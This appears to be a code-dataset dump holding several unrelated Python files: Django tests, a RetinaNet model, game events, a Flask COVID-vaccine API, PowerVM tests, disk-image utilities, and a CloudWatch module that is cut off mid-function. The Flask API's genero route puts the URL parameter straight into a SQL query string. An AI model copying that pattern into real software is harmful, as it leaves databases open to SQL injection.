max_stars_repo_path
stringlengths 3
269
| max_stars_repo_name
stringlengths 4
119
| max_stars_count
int64 0
191k
| id
stringlengths 1
7
| content
stringlengths 6
1.05M
| score
float64 0.23
5.13
| int_score
int64 0
5
|
---|---|---|---|---|---|---|
contenido/tests/HU028_test.py | slinan/border | 0 | 12786451 | from django.test import TestCase
from django.test import Client
from django.contrib.auth.models import User
from contenido.models import Audio
# Create your tests here.
class ContenidoTests(TestCase):
def setUp(self):
# Every test needs access to the request factory.
user = User.objects.create_user(
username='userTest', email='<EMAIL>', password='<PASSWORD>')
audio = Audio()
audio.nom_audio = "song1"
audio.val_recurso = "http://la...."
audio.fec_entrada_audio = "2016-10-08"
audio.save()
audio.likes.add(User.objects.get(id=user.id))
audio.save()
def unlike_test_view(self):
audio = Audio.objects.get(pk=1)
total_likes_before = audio.likes.count()
c = Client()
response = c.post('/unlike/', {'song_id': 1})
audio = Audio.objects.get(pk=1)
audio.likes.remove(User.objects.get(id=1))
total_likes_after = audio.likes.count()
self.assertEqual(response.status_code, 200)
self.assertEqual(total_likes_after, total_likes_before - 1)
| 2.484375 | 2 |
model/create_model_retinanet.py | Abdumaleek/SDK | 1 | 12786452 | import os
import torch
import numpy as np
from pytorch_retinanet.loss import FocalLoss
from pytorch_retinanet.retinanet import RetinaNet
from pytorch_retinanet.encoder import DataEncoder
import local_config
from braille_utils import label_tools
def create_model_retinanet(params, device):
'''
Creates model and auxiliary functions
:param params: OvoTools.AttrDict with parameters
:param device: 'cuda'/'cpu'
:return: model, detection_collate function, loss function
'''
use_multiple_class_groups = params.data.get('class_as_6pt', False)
num_classes = 1 if params.data.get_points else ([1]*6 if use_multiple_class_groups else 64)
encoder = DataEncoder(**params.model_params.encoder_params)
model = RetinaNet(num_layers=encoder.num_layers(), num_anchors=encoder.num_anchors(),
num_classes=num_classes,
num_fpn_layers=params.model_params.get('num_fpn_layers', 0)).to(device)
retina_loss = FocalLoss(num_classes=num_classes, **params.model_params.get('loss_params', dict()))
def detection_collate(batch):
'''
:param batch: list of (tb image(CHW float), [(left, top, right, bottom, class),...]) сcoords in [0,1], extra_params
:return: batch: ( images (BCNHW), ( encoded_rects, encoded_labels ) )
copied from RetinaNet, but a) accepts rects as input, b) returns (x,y) where y = (encoded_rects, encoded_labels)
'''
# t = [b for b in batch if b[1].shape[0]==0]
# if len(t):
# pass
#device = torch.device('cpu') # commented to use settings.device
boxes = [torch.tensor(b[1][:, :4], dtype = torch.float32, device=device)
*torch.tensor(params.data.net_hw[::-1]*2, dtype = torch.float32, device=device) for b in batch]
labels = [torch.tensor(b[1][:, 4], dtype = torch.long, device=device) for b in batch]
if params.data.get_points:
labels = [torch.tensor([0]*len(lb), dtype = torch.long, device=device) for lb in labels]
elif use_multiple_class_groups:
# классы нумеруются с 0, отсутствие класса = -1, далее в encode cls_targets=1+labels
labels = [torch.tensor([[int(ch)-1 for ch in label_tools.int_to_label010(int_lbl.item())] for int_lbl in lb],
dtype=torch.long, device=device) for lb in labels]
original_images = [b[3] for b in batch if len(b)>3] # batch contains augmented image if not in train mode
imgs = [x[0] for x in batch]
calc_cls_mask = torch.tensor([b[2].get('calc_cls', True) for b in batch],
dtype=torch.bool,
device=device)
h, w = tuple(params.data.net_hw)
num_imgs = len(batch)
inputs = torch.zeros(num_imgs, 3, h, w).to(imgs[0])
loc_targets = []
cls_targets = []
for i in range(num_imgs):
inputs[i] = imgs[i]
labels_i = labels[i]
if use_multiple_class_groups and len(labels_i.shape) != 2: # it can happen if no labels are on image
labels_i = labels_i.reshape((0, len(num_classes)))
loc_target, cls_target, max_ious = encoder.encode(boxes[i], labels_i, input_size=(w,h))
loc_targets.append(loc_target)
cls_targets.append(cls_target)
if original_images: # inference mode
return inputs, ( torch.stack(loc_targets), torch.stack(cls_targets), calc_cls_mask), original_images
else:
return inputs, (torch.stack(loc_targets), torch.stack(cls_targets), calc_cls_mask)
class Loss:
def __init__(self):
self.encoder = encoder
pass
def __call__(self, pred, targets):
loc_preds, cls_preds = pred
loc_targets, cls_targets, calc_cls_mask = targets
if calc_cls_mask.min(): # Ничего не пропускаем
calc_cls_mask = None
loss = retina_loss(loc_preds, loc_targets, cls_preds, cls_targets, cls_calc_mask=calc_cls_mask)
return loss
def get_dict(self, *kargs, **kwargs):
return retina_loss.loss_dict
def metric(self, key):
def call(*kargs, **kwargs):
return retina_loss.loss_dict[key]
return call
return model, detection_collate, Loss()
if __name__ == '__main__':
pass
| 2.15625 | 2 |
bomberman/model/events.py | raphaelreme/bomberman | 0 | 12786453 | <reponame>raphaelreme/bomberman<filename>bomberman/model/events.py<gh_stars>0
"""All the events used by the model based on the observer/observable event."""
from __future__ import annotations
from . import entity
from ..designpattern.event import Event
class MazeStartEvent(Event):
"""At each new maze"""
class MazeEndEvent(Event):
"""When a maze is released"""
class GameEndEvent(Event):
"""When the game is done"""
class StartScreenEvent(Event):
"""At the beginning of each start screen"""
class ForwardStartScreenEvent(Event):
"Could be used to update the start scren"
class BonusScreenEvent(Event):
"""At the begining of each bonus screen"""
class ForwardBonusScreenEvent(Event):
"""Could be used to update the bonus screen (animation ?)"""
class MazeFailedEvent(Event):
"""When the maze is detected as failed"""
class MazeSolvedEvent(Event):
"""When the maze is detected as solved"""
class MazeEndingEvent(Event):
"""Each update of the maze, when it is ending"""
class ExtraGameEvent(Event):
"""At the beginning of the extra game"""
class HurryUpEvent(Event):
"""30s before time's up"""
class ForwardTimeEvent(Event):
"""Notify the view of a progress in time"""
def __init__(self, delay: float) -> None:
super().__init__()
self.delay = delay
class EntityEvent(Event):
def __init__(self, entity_: entity.Entity):
super().__init__()
self.entity = entity_
class NewEntityEvent(EntityEvent):
pass
class MovedEntityEvent(EntityEvent):
pass
class HitEntityEvent(EntityEvent):
pass
class RemovingEntityEvent(EntityEvent):
"""Each time the entity is removing"""
class RemovedEntityEvent(EntityEvent):
pass
class LifeLossEvent(EntityEvent):
"""When a player loses a life (after its removing delay)"""
class PlayerDetailsEvent(EntityEvent):
"""When a player details has to be updated"""
class NoiseEvent(EntityEvent):
"""At each entity noise (Not all sounds)"""
class StartRemovingEvent(EntityEvent):
"""when the entity reaches removing state"""
class ScoreEvent(EntityEvent):
"""When score is earned
Will trigger a score slider (Notify by the entity as a change of the maze)
"""
class ExtraLifeEvent(EntityEvent):
"""When a player completed EXTRA letters
Will trigger a slider (Notify by the player as a change of the maze)
"""
def __init__(self, entity_: entity.Entity):
super().__init__(entity_)
self.entity: entity.Player
| 2.8125 | 3 |
aashe_bulletin/migrations/0001_use_ulysses_for_historical_issues.py | AASHE/aashe-bulletin | 0 | 12786454 | <reponame>AASHE/aashe-bulletin
# -*- coding: utf-8 -*-
"""For all extant issues, use 'ulysses.html' for the HTML template.
Previous templates expect one Category per Post; ulysses.html handles
multiple Categories per Post.
Since supporting multiple Categories per Post required a schema
change, historical HTML templates won't work even for historical Issues.
"""
from __future__ import unicode_literals
from django.db import migrations
def update_issues(apps, schema_editor):
Issue = apps.get_model("bulletin", "Issue")
for issue in Issue.objects.all():
if issue.html_template_name: # Many old Issues have no HTML template.
issue.html_template_name = "email_templates/ulysses.html"
issue.save()
class Migration(migrations.Migration):
dependencies = [
("bulletin", "0005_delete_post_field_category")
]
operations = [
migrations.RunPython(update_issues)
]
| 1.984375 | 2 |
api/main.py | manucabral/CODAVI | 11 | 12786455 | <filename>api/main.py
import pandas as pd
import matplotlib.pyplot as plt
import mysql.connector
import base64
import io
from flask import Flask
from datetime import datetime
app = Flask(__name__)
FECHA_ACTUAL = datetime.now().date().isoformat()
def obtenerDatosVacuna():
try:
url = 'https://sisa.msal.gov.ar/datos/descargas/covid-19/files/Covid19VacunasAgrupadas.csv.zip'
data = pd.read_csv(url)
except Exception as Error:
print('Hubo un error al leer el dataset', Error)
sputnik = data.query('vacuna_nombre.str.contains("Sputnik")')
astrazeneca = data.query('vacuna_nombre.str.contains("AstraZeneca")')
sinopharm = data.query('vacuna_nombre.str.contains("Sinopharm")')
covishield = data.query('vacuna_nombre.str.contains("COVISHIELD")')
moderna = data.query('vacuna_nombre.str.contains("Moderna")')
return sputnik, astrazeneca, sinopharm, covishield, moderna
def obtenerDatosGenero(dosis):
try:
cnx = mysql.connector.connect(
host="desconocido",
port=3306,
user="desconocido",
password="<PASSWORD>",
db="desconocido"
)
cursor = cnx.cursor()
except Exception:
return {
"status": 204,
"titulo": f"Comparativa por género dosis {dosis}",
"data": "No hay datos"}
query = (
f"SELECT masculino, femenino, fecha FROM `x3lh5zri57nk7is6`.`generos` WHERE dosis = '{dosis}' and fecha = '{FECHA_ACTUAL}';")
cursor.execute(query)
result = cursor.fetchall()
if len(result) == 0:
return {
"status": 204,
"titulo": f"Comparativa por género dosis {dosis}",
"data": "No hay datos actualizados para hoy."}
cantidadMasculino, cantidadFemenino, fecha = result[0]
cursor.close()
cnx.close()
return {
"status": 200,
"titulo": f"Comparativa por género dosis {dosis}",
"descripcion": f'Cantidad de vacunados por género en la DOSIS {dosis}',
"fecha": str(fecha),
"dosis": f"{dosis}",
"data": {
"masculino": {
"nombre": "Masculino",
"total": int(cantidadMasculino),
},
"femenino": {
"nombre": "Femenino",
"total": int(cantidadFemenino)
}
}
}
@app.errorhandler(404)
def page_not_found(e):
return "La ruta que buscas no existe."
@app.route('/', methods=['GET'])
def index():
return "Bienvenido a la API de Codavi."
@app.route('/vacunas/<dosis>', methods=['GET'])
def vacunas(dosis):
titulo = None
descripcion = None
objetivo_dosis = None
sputnik, astrazeneca, sinopharm, covishield, moderna = obtenerDatosVacuna()
if int(dosis) == 1:
titulo = 'Vacunas aplicadas en la primera dosis'
descripcion = "Cantidad de vacunas aplicadas por marca en la primera dosis"
objetivo_dosis = 'primera_dosis_cantidad'
elif int(dosis) == 2:
titulo = 'Vacunas aplicadas en la segunda dosis'
descripcion = "Cantidad de vacunas aplicadas por marca en la segunda dosis"
objetivo_dosis = 'segunda_dosis_cantidad'
sputnik_total = sputnik[objetivo_dosis].sum()
astrazeneca_total = astrazeneca[objetivo_dosis].sum()
sinopharm_total = sinopharm[objetivo_dosis].sum()
covishield_total = covishield[objetivo_dosis].sum()
moderna_total = moderna[objetivo_dosis].sum()
total = sputnik_total + astrazeneca_total + \
sinopharm_total + covishield_total + moderna_total
x = ['Sputnik', 'AstraZeneca', 'Sinopharm', 'Covishield', 'Moderna']
y = [sputnik_total, astrazeneca_total,
sinopharm_total, covishield_total, moderna_total]
plt.bar(x, y, color='green')
plt.ylabel('Cantidad')
plt.xlabel('Marca')
plt.title(titulo)
img = io.BytesIO()
plt.savefig(img, format='png', bbox_inches="tight")
plt.close()
img = base64.b64encode(img.getvalue()).decode("utf-8").replace("\n", "")
return {
"status": 200,
"titulo": titulo,
"descripcion": descripcion,
"total": int(total),
"grafico": img,
"data": {
"Sputnik": {
"nombre": "Sputnik",
"total": int(sputnik_total)
},
"AstraZeneca": {
"nombre": "AstraZeneca",
"total": int(astrazeneca_total)
},
"Sinopharm": {
"nombre": "Sinopharm",
"total": int(sinopharm_total)
},
"Covishield": {
"nombre": "Covishield",
"total": int(covishield_total)
},
"Moderna": {
"nombre": "Moderna",
"total": int(moderna_total)
}
}
}
@app.route('/genero/<dosis>', methods=['GET'])
def genero(dosis=0):
return obtenerDatosGenero(dosis)
| 3.046875 | 3 |
vcflat/tests/test_HeaderExtraction/test_populatevcfheader.py | arontommi/VCFlat | 4 | 12786456 | <gh_stars>1-10
import os
from vcflat.HeaderExtraction import VcfHeader
def get_input(samples_in_header=None):
test_data_dir = os.path.join(os.path.dirname(__file__), "..", "test_data")
i = os.path.join(test_data_dir, "test.snpeff.vcf")
vcfh = VcfHeader(i, samples_in_header=samples_in_header)
return vcfh
def test_1():
""" checks that output is list """
assert type(get_input().header) is list
def test_2():
""" checks that output not empty """
assert get_input().header is not None
def test_3():
checklist = [
"#CHROM",
"POS",
"ID",
"REF",
"ALT",
"QUAL",
"FILTER",
"INFO",
"FORMAT",
]
""" checks if correct things are in the header """
assert all(i in get_input().header for i in checklist)
def test_4():
checklist = [
"#CHROM",
"POS",
"ID",
"REF",
"ALT",
"QUAL",
"FILTER",
"INFO",
"FORMAT",
"1",
"2",
"3",
"4",
]
assert all(i in get_input(samples_in_header="1 2 3 4").header for i in checklist)
| 2.46875 | 2 |
nova_powervm/tests/virt/powervm/tasks/test_network.py | UbuntuEvangelist/nova-powervm | 0 | 12786457 | # Copyright 2015 IBM Corp.
#
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import eventlet
import mock
from nova import exception
from nova import objects
from nova import test
from pypowervm.tests import test_fixtures as pvm_fx
from nova_powervm.tests.virt import powervm
from nova_powervm.virt.powervm.tasks import network as tf_net
def cna(mac):
"""Builds a mock Client Network Adapter for unit tests."""
nic = mock.MagicMock()
nic.mac = mac
nic.vswitch_uri = 'fake_href'
return nic
class TestNetwork(test.TestCase):
def setUp(self):
super(TestNetwork, self).setUp()
self.apt = self.useFixture(pvm_fx.AdapterFx()).adpt
self.mock_lpar_wrap = mock.MagicMock()
self.mock_lpar_wrap.can_modify_io.return_value = True, None
@mock.patch('nova_powervm.virt.powervm.vm.get_cnas')
def test_unplug_vifs(self, mock_vm_get):
"""Tests that a delete of the vif can be done."""
inst = objects.Instance(**powervm.TEST_INSTANCE)
# Mock up the CNA response. One should already exist, the other
# should not.
cnas = [cna('AABBCCDDEEFF'), cna('AABBCCDDEE11'), cna('AABBCCDDEE22')]
mock_vm_get.return_value = cnas
# Mock up the network info. This also validates that they will be
# sanitized to upper case.
net_info = [
{'address': 'aa:bb:cc:dd:ee:ff'}, {'address': 'aa:bb:cc:dd:ee:22'},
{'address': 'aa:bb:cc:dd:ee:33'}
]
# Run method
p_vifs = tf_net.UnplugVifs(self.apt, inst, net_info, 'host_uuid')
p_vifs.execute(self.mock_lpar_wrap)
# The delete should have only been called once. The second CNA didn't
# have a matching mac...so it should be skipped.
self.assertEqual(1, cnas[0].delete.call_count)
self.assertEqual(0, cnas[1].delete.call_count)
self.assertEqual(1, cnas[2].delete.call_count)
def test_unplug_vifs_invalid_state(self):
"""Tests that the delete raises an exception if bad VM state."""
inst = objects.Instance(**powervm.TEST_INSTANCE)
# Mock that the state is incorrect
self.mock_lpar_wrap.can_modify_io.return_value = False, 'bad'
# Run method
p_vifs = tf_net.UnplugVifs(self.apt, inst, mock.Mock(), 'host_uuid')
self.assertRaises(tf_net.VirtualInterfaceUnplugException,
p_vifs.execute, self.mock_lpar_wrap)
@mock.patch('nova_powervm.virt.powervm.vm.crt_vif')
@mock.patch('nova_powervm.virt.powervm.vm.get_cnas')
def test_plug_vifs_rmc(self, mock_vm_get, mock_vm_crt):
"""Tests that a crt vif can be done with secure RMC."""
inst = objects.Instance(**powervm.TEST_INSTANCE)
# Mock up the CNA response. One should already exist, the other
# should not.
mock_vm_get.return_value = [cna('AABBCCDDEEFF'), cna('AABBCCDDEE11')]
# Mock up the network info. This also validates that they will be
# sanitized to upper case.
net_info = [
{'address': 'aa:bb:cc:dd:ee:ff'}, {'address': 'aa:bb:cc:dd:ee:22'},
{'address': 'aa:bb:cc:dd:ee:33'}
]
# Run method
p_vifs = tf_net.PlugVifs(mock.MagicMock(), self.apt, inst, net_info,
'host_uuid')
p_vifs.execute(self.mock_lpar_wrap)
# The create should have only been called once.
self.assertEqual(2, mock_vm_crt.call_count)
@mock.patch('nova_powervm.virt.powervm.vm.crt_vif')
@mock.patch('nova_powervm.virt.powervm.vm.get_cnas')
def test_plug_vifs_rmc_no_create(self, mock_vm_get, mock_vm_crt):
"""Verifies if no creates are needed, none are done."""
inst = objects.Instance(**powervm.TEST_INSTANCE)
# Mock up the CNA response. Both should already exist.
mock_vm_get.return_value = [cna('AABBCCDDEEFF'), cna('AABBCCDDEE11')]
# Mock up the network info. This also validates that they will be
# sanitized to upper case.
net_info = [
{'address': 'aa:bb:cc:dd:ee:ff'}, {'address': 'aa:bb:cc:dd:ee:11'}
]
# Run method
p_vifs = tf_net.PlugVifs(mock.MagicMock(), self.apt, inst, net_info,
'host_uuid')
resp = p_vifs.execute(self.mock_lpar_wrap)
# The create should not have been called. The response should have
# been empty.
self.assertEqual(0, mock_vm_crt.call_count)
self.assertEqual([], resp)
# State check shouldn't have even been invoked as no creates were
# required
self.assertEqual(0, self.mock_lpar_wrap.can_modify_io.call_count)
@mock.patch('nova_powervm.virt.powervm.vm.crt_vif')
@mock.patch('nova_powervm.virt.powervm.vm.get_cnas')
def test_plug_vifs_invalid_state(self, mock_vm_get, mock_vm_crt):
"""Tests that a crt_vif fails when the LPAR state is bad."""
inst = objects.Instance(**powervm.TEST_INSTANCE)
# Mock up the CNA response. Only doing one for simplicity
mock_vm_get.return_value = []
net_info = [{'address': 'aa:bb:cc:dd:ee:ff'}]
# Mock that the state is incorrect
self.mock_lpar_wrap.can_modify_io.return_value = False, 'bad'
# Run method
p_vifs = tf_net.PlugVifs(mock.MagicMock(), self.apt, inst, net_info,
'host_uuid')
self.assertRaises(exception.VirtualInterfaceCreateException,
p_vifs.execute, self.mock_lpar_wrap)
# The create should not have been invoked
self.assertEqual(0, mock_vm_crt.call_count)
@mock.patch('nova_powervm.virt.powervm.vm.crt_vif')
@mock.patch('nova_powervm.virt.powervm.vm.get_cnas')
def test_plug_vifs_timeout(self, mock_vm_get, mock_vm_crt):
"""Tests that crt vif failure via loss of neutron callback."""
inst = objects.Instance(**powervm.TEST_INSTANCE)
# Mock up the CNA response. Only doing one for simplicity
mock_vm_get.return_value = [cna('AABBCCDDEE11')]
# Mock up the network info.
net_info = [{'address': 'aa:bb:cc:dd:ee:ff'}]
# Ensure that an exception is raised by a timeout.
mock_vm_crt.side_effect = eventlet.timeout.Timeout()
# Run method
p_vifs = tf_net.PlugVifs(mock.MagicMock(), self.apt, inst, net_info,
'host_uuid')
self.assertRaises(exception.VirtualInterfaceCreateException,
p_vifs.execute, self.mock_lpar_wrap)
# The create should have only been called once.
self.assertEqual(1, mock_vm_crt.call_count)
@mock.patch('nova_powervm.virt.powervm.vm.crt_secure_rmc_vif')
@mock.patch('nova_powervm.virt.powervm.vm.get_secure_rmc_vswitch')
@mock.patch('nova_powervm.virt.powervm.vm.crt_vif')
@mock.patch('nova_powervm.virt.powervm.vm.get_cnas')
def test_plug_mgmt_vif(self, mock_vm_get, mock_vm_crt,
mock_get_rmc_vswitch, mock_crt_rmc_vif):
"""Tests that a mgmt vif can be created."""
inst = objects.Instance(**powervm.TEST_INSTANCE)
# Mock up the rmc vswitch
vswitch_w = mock.MagicMock()
vswitch_w.href = 'fake_mgmt_uri'
mock_get_rmc_vswitch.return_value = vswitch_w
# Run method
p_vifs = tf_net.PlugMgmtVif(self.apt, inst, 'host_uuid')
p_vifs.execute([])
# The create should have only been called once.
self.assertEqual(1, mock_crt_rmc_vif.call_count)
@mock.patch('nova.utils.is_neutron')
def test_get_vif_events(self, mock_is_neutron):
# Set up common mocks.
inst = objects.Instance(**powervm.TEST_INSTANCE)
net_info = [mock.MagicMock(), mock.MagicMock()]
net_info[0]['id'] = 'a'
net_info[0].get.return_value = False
net_info[1]['id'] = 'b'
net_info[1].get.return_value = True
# Set up the runner.
p_vifs = tf_net.PlugVifs(mock.MagicMock(), self.apt, inst, net_info,
'host_uuid')
# Mock that neutron is off.
mock_is_neutron.return_value = False
self.assertEqual([], p_vifs._get_vif_events())
# Turn neutron on.
mock_is_neutron.return_value = True
resp = p_vifs._get_vif_events()
# Only one should be returned since only one was active.
self.assertEqual(1, len(resp))
| 1.828125 | 2 |
wce_triage/lib/disk_images.py | pfrouleau/wce-triage-v2 | 3 | 12786458 | # Copyright (c) 2019 <NAME>
# MIT license - see LICENSE
"""disk_image scans the disk image candidate directories and returns availabe disk images for loading.
"""
import os, datetime, json, traceback
from ..lib.util import get_triage_logger, init_triage_logger
tlog = get_triage_logger()
global WCE_IMAGES
WCE_IMAGES = "/usr/local/share/wce/wce-disk-images"
IMAGE_META_JSON_FILE = ".disk_image_type.json"
def set_wce_disk_image_dir(dir):
global WCE_IMAGES
WCE_IMAGES = dir
pass
# gets the potential directories to look for disk images
def get_maybe_disk_image_directories():
global WCE_IMAGES
dirs = []
# No longer look for other directories.
# It would make things rather complicated.
if os.path.exists(WCE_IMAGES) and os.path.isdir(WCE_IMAGES) and WCE_IMAGES not in dirs:
dirs.append(WCE_IMAGES)
pass
return dirs
# gets the potential directories to look for disk images
def get_disk_image_list_order():
global WCE_IMAGES
list_order = {}
if os.path.exists(WCE_IMAGES) and os.path.isdir(WCE_IMAGES):
list_order_path = os.path.join(WCE_IMAGES, ".list-order")
if os.path.exists(list_order_path):
try:
with open(list_order_path) as list_order_fd:
dirs = list_order_fd.readlines()
for i in range(len(dirs)):
list_order[dirs[i].strip()] = i
pass
pass
pass
except:
pass
pass
pass
return list_order
#
#
#
def list_image_files(dirs):
"""lists the images files under the dirs.
:return:
a list of tuples
the shape of tuple: (image_filename, subdir, fullpath)
"""
images = []
for a_dir in dirs:
for direntry in os.listdir(a_dir):
# Anything starting with "." is ignored
if direntry[0:1] == '.':
continue
catalog_dir = os.path.join(a_dir, direntry)
image_meta_file = os.path.join(catalog_dir, IMAGE_META_JSON_FILE)
if not os.path.exists(image_meta_file) or not os.path.isfile(image_meta_file):
continue
if direntry.endswith(".partclone.gz"):
images.append( (direntry, "", catalog_dir) )
pass
if os.path.isdir(catalog_dir):
for direntryinsubdir in os.listdir(catalog_dir):
# Anything starting with "." is ignored
if direntryinsubdir[0:1] == '.':
continue
if direntryinsubdir.endswith(".partclone.gz"):
images.append((direntryinsubdir, direntry, os.path.join(catalog_dir, direntryinsubdir)) )
pass
pass
pass
pass
pass
return images
#
#
#
def get_disk_images(wce_share_url=None):
'''scans the known drectories for disk image and returns the list of disk images
:arg:
wce_share_url: prefix for the disk imagefile.
:returns: list of dict instances.
mtime: file modify time
restoreType: keyword for restore type. [wce|wce-16|triage|clone]
The restore type is nothing more than the name of directory, and
should match exactly to the restore type.
name: filename - this is shown to the user.
size: file size
fullpath: the full path.
..note the entries are deduped by the filename so if two directories
contain the same file name, only one is pikced.
'''
# gather disk image files
_images= list_image_files(get_maybe_disk_image_directories())
# Dedup the same file name
images = {}
for image in _images:
fname, subdir, fullpath = image
images[fname] = image
pass
# Sort image listing order
result = []
for filename, image in images.items():
fname, subdir, fullpath = image
filestat = os.stat(fullpath)
mtime = datetime.datetime.fromtimestamp(filestat.st_mtime)
# If wce_share_url is provided, reconstruct the fullpath. HTTP server needs to respond to the route.
if wce_share_url:
fullpath = '{wce_share_url}/wce-disk-images/{restoretype}/{filename}'.format(wce_share_url=wce_share_url, restoretype=subdir, filename=filename)
pass
fattr = { "mtime": mtime.strftime('%Y-%m-%d %H:%M'),
"restoreType" : subdir,
"name": filename,
"fullpath": fullpath,
"size": filestat.st_size,
"subdir": subdir,
"index": len(result) }
result.append(fattr)
pass
list_order = get_disk_image_list_order()
n = len(result)
result.sort(key=lambda x: list_order.get(x["subdir"], len(list_order)) * n + x["index"])
return result
def read_disk_image_types(verbose=False):
'''scans the known drectories for disk image and returns the list of disk image types
:arg none
:returns: list of dict instances which is .disk_image_type.json file in the directory.
[ { "id": "wce-18",
"filestem": "wce-mate18",
"name": "WCE Ubuntu 18.04LTS",
"timestamp": true,
"efi_image": ".efi-512M.fat32.partclone.gz",
"partition_map": "gpt",
"hostname": "wce",
"randomize_hostname": true,
"cmdline": {
"acpi_enforce_resources": "lax" ,
"nvme_core.default_ps_max_latency_us": "5500"
}
},
{ ... }
]
'''
image_metas = []
for subdir in get_maybe_disk_image_directories():
if verbose:
print("Checking subdir " + subdir)
pass
index = 0
for direntry in os.listdir(subdir):
catalog_dir = os.path.join(subdir, direntry)
image_meta = read_disk_image_type(catalog_dir)
if verbose:
print("Catalog dir " + catalog_dir)
print(image_meta)
pass
if image_meta:
image_meta['index'] = index
image_metas.append(image_meta)
index += 1
pass
pass
pass
list_order = get_disk_image_list_order()
n = len(image_metas)
if list_order:
image_metas.sort(key=lambda x: list_order.get(x["id"], len(list_order)) * n + x['index'])
pass
return image_metas
def read_disk_image_type(catalog_dir):
'''reads the disk image type file from the directory
:arg dir
:returns: a dict instance from the image-meta
'''
result = None
try:
image_meta_file = os.path.join(catalog_dir, IMAGE_META_JSON_FILE)
if not os.path.exists(image_meta_file) or not os.path.isfile(image_meta_file):
return None
with open(image_meta_file) as meta_file:
result = json.load(meta_file)
pass
pass
except json.decoder.JSONDecodeError:
tlog.debug('catalog_dir %s: JSON parse error. Check the contents.' % catalog_dir);
pass
except:
# If anything goes wrong, just ignore the directory.
tlog.debug('catalog_dir %s: %s' % (catalog_dir, traceback.format_exc()))
pass
#
if result:
result["catalogDirectory"] = catalog_dir
pass
return result
def make_disk_image_name(destdir, inname, filesystem='ext4'):
image_meta = read_disk_image_type(destdir)
if image_meta is None:
if inname is None:
exc_msg = "Directory {dir} does not have '{json_file}' file.".format(dir=destdir, json_file=IMAGE_META_JSON_FILE)
raise Exception(exc_msg)
return inname
imagename = image_meta["filestem"]
if not imagename:
imagename = inname
pass
if image_meta.get("timestamp", False):
timestamp = datetime.date.today().isoformat()
imagename = imagename + "-" + timestamp
pass
# Right now, this is making ext4
imagename = imagename + ".%s.partclone.gz" % filesystem
return os.path.join(destdir, imagename)
def get_file_system_from_source(source):
filesystem_ext = None
tail = ".partclone.gz"
if source.endswith(tail):
source = source[:-len(tail)]
else:
return None
try:
filesystem_ext = os.path.splitext(source)[1][1:]
except:
pass
if filesystem_ext in ['ext4', 'ext3', 'fat32', 'vfat', 'fat16']:
return filesystem_ext
return None
def translate_disk_image_name_to_url(wce_share_url, disk_image_name):
for source in get_disk_images(wce_share_url):
if source["name"] == disk_image_name:
return source
pass
return disk_image
#
if __name__ == "__main__":
print("HELLO")
tlog = init_triage_logger(filename='/tmp/disk_images.log')
print(read_disk_image_types(verbose=True))
print(get_disk_images())
print(get_file_system_from_source("a.ext4.partclone.gz"))
print(get_file_system_from_source("a.ext4.partclone"))
print(get_file_system_from_source("a.partclone.gz"))
print(read_disk_image_type("/usr/local/share/wce/wce-disk-images/triage"))
print("HELLO HELLO")
for disk_image in get_disk_images():
print(translate_disk_image_name_to_url("http://10.3.2.1:8080/wce", disk_image["name"]))
pass
pass
| 2.765625 | 3 |
app/mod_repo/package_manager.py | v-yussupov/hdtapps-prototype | 2 | 12786459 | <reponame>v-yussupov/hdtapps-prototype<filename>app/mod_repo/package_manager.py
import json
import os
from app.mod_repo.models import *
from app.mod_repo.dockerfile_generator import Dockerfile
def read_package_specification(temp_app_dir):
try:
pkg_spec_path = os.path.join(temp_app_dir, "app-spec.json")
with open(pkg_spec_path) as data_file:
data = json.load(data_file)
return data
except Exception as e:
pass
def deserialize_package_specification(temp_app_dir):
try:
pkg_spec_path = os.path.join(temp_app_dir, "app-spec.json")
with open(pkg_spec_path, 'r') as pkg_spec_file:
data = json.load(pkg_spec_file)
obj = dict_to_app_pkg_spec_object(data)
return obj
except Exception as e:
print(e)
def generate_dockerfile(pkg_spec: ApplicationSpecification, path) -> bool:
try:
d = Dockerfile(pkg_spec)
d.save(path)
return True
except:
# TODO: handle exception
return False
| 2.03125 | 2 |
examples/calc_wer.py | jumon/pywer | 2 | 12786460 | import pywer
references = [
"this is a simple python package",
"it calculates word error rate",
"it can also calculate cer",
]
hypotheses = [
"this is the simple python package",
"it calculates word error",
"it can also calculate see er",
]
wer = pywer.wer(references, hypotheses)
cer = pywer.cer(references, hypotheses)
print(f"WER: {wer:.2f}, CER: {cer:.2f}")
| 2.25 | 2 |
fondat/aws/cloudwatch.py | fondat/fondat-aws | 0 | 12786461 | <gh_stars>0
"""Fondat module for AWS CloudWatch."""
import logging
from collections import deque
from collections.abc import Iterable
from datetime import datetime
from fondat.aws import Service
from fondat.data import datacls
from fondat.resource import resource, operation, mutation
from fondat.security import Policy
from typing import Any, Literal, Optional, Union
from fondat.monitoring import Measurement, Counter, Gauge, Absolute
_logger = logging.getLogger(__name__)
Unit = Literal[
"Seconds",
"Microseconds",
"Milliseconds",
"Bytes",
"Kilobytes",
"Megabytes",
"Gigabytes",
"Terabytes",
"Bits",
"Kilobits",
"Megabits",
"Gigabits",
"Terabits",
"Percent",
"Count",
"Bytes/Second",
"Kilobytes/Second",
"Megabytes/Second",
"Gigabytes/Second",
"Terabytes/Second",
"Bits/Second",
"Kilobits/Second",
"Megabits/Second",
"Gigabits/Second",
"Terabits/Second",
"Count/Second",
]
Value = Union[int, float]
Values = dict[Union[int, float], Union[int, float]] # value: count
@datacls
class Statistics:
"""
Statistics measurement type.
Attributes:
• count: count of measured values
• sum: sum of all measured values
• minimum: minimum measured value
• maximum: maximum measured value
"""
count: Union[int, float]
sum: Union[int, float]
minimum: Union[int, float]
maximum: Union[int, float]
@datacls
class Metric:
"""
CloudWatch metric type.
Attributes:
• name: name of the CloudWatch metric
• dimensions: name/value pair of categories for characteristics
• value: value of measurement
• timestamp: date and time of the measurement to record
• unit: Optional[Unit]
• resolution: granularity of the metric
"""
name: str
dimensions: dict[str, str]
value: Union[Value, Values, Statistics]
timestamp: datetime
unit: Optional[Unit]
resolution: Optional[int]
def cloudwatch_resource(
*,
service: Service = None,
policies: Iterable[Policy] = None,
):
"""
Create CloudWatch resource.
Parameters:
• service: CloudWatch service object
• security: security requirements to apply to all operations
"""
if service is None:
service = Service("cloudwatch")
if service.name != "cloudwatch":
